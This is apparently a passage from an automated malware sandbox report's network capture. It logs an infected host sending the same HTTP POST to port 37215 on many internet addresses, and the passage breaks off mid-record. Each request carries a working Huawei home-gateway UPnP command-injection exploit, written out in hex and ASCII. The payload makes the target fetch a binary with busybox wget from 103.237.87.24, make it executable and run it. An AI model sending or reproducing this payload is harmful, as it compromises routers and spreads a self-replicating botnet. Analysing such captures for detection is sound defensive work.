2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1048192.168.2.134292641.227.16.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431466103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1049192.168.2.134946412.21.71.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431492090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1050192.168.2.136066664.227.77.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431498051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1051192.168.2.1343138104.107.228.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431535959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1052192.168.2.1356264157.24.203.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431552887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1053192.168.2.133720441.58.64.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431579113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1054192.168.2.1347650157.135.233.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431601048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1055192.168.2.1336246197.22.149.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431612968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1056192.168.2.1339620157.15.56.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431615114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1057192.168.2.1351104206.241.54.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431641102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1058192.168.2.1356968108.149.218.9737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431642056 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
